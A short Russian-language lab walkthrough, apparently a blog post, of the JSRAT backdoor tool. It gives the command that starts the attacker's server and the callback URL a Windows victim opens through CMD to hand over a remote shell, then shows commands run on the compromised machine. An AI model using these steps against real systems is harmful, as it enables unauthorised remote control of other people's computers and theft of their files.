JSRAT – секретный бэкдор управления

JsRat - это скрипт на основе python, разработанный для создания бэкдора на компьютере-жертве с использованием полезных нагрузок JavaScript и протокола HTTP для связи между сервером и целевыми хостами.

Здесь я использовал Kali Linux (компьютер злоумышленника) и компьютер жертвы (Windows 10)

Установка и настройка

• Скачать инструмент JSRAT можно здесь.

• Загрузите и дайте соответствующее разрешение на выполнение скрипта.На рисунке выше показана полная установка

Запуск веб-сервера

• Запустите и выполните команду: python JSRAT.py -i <kali Linux или IP-адрес злоумышленника> -p 8080

• JSRAT предоставляет список URL-адресов.Скопируйте команду клиента вот она http://192.168.172.143:8080/wtf

Машина-жертва

• Откройте этот URL-адрес клиентской команды в браузере жертвы

• Чтобы получить полезную нагрузку оболочки, сгенерированную URL, необходимо открыть с помощью CMD.

• Как только команда будет выполнена, будет получена оболочка.

Подключение по бэкдору

• Поехали!!! Мы подключились к машине-жертве

• Давайте попробуем какую-нибудь команду Windows: Ipconfig

• На приведенном выше рисунке показано, что выполнение команды calc открывает калькулятор Windows. JSRat также может предоставлять загрузку, чтение и скачивание файлов.